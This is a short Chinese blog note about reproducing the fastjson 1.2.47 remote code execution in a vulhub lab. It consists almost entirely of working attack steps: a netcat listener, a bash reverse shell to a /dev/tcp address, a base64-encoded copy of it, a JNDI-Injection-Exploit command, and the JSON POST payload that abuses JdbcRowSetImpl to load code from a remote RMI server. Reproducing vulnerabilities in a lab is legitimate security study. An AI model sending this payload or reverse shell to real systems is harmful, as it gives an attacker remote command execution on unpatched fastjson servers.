天天看點

fastjson-複現筆記vulhub:attackerpost:

vulhub:

找到fastjson1.2.47rce

docker-compose up -d
nc -lvp 9443
           

attacker

反彈shell

bash -i >& /dev/tcp/192.168.211.129/9443 0>&1
           

加密

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xMjkvOTQ0MyAwPiYx}|{base64,-d}|{bash,-i}
           

最後的ip是apache伺服器的,172.26.39.196啟動apache指令

/usr/local/apache-tomcat-8.5.69/webapps/ROOT# ./startup.sh

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xMjkvOTQ0MyAwPiYx}|{base64,-d}|{bash,-i}" -A "172.26.39.196"
           

起監聽

post:

Content-Type:application/json

{

“a”:{

“@type”:“java.lang.Class”,

“val”:“com.sun.rowset.JdbcRowSetImpl”

},

“b”:{

“@type”:“com.sun.rowset.JdbcRowSetImpl”,

“dataSourceName”:“rmi://172.26.39.196:1099/mmwktn”,

“autoCommit”:true

}

}

其中dataSourceName是JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar産生的jdk1.8的rmi位址

繼續閱讀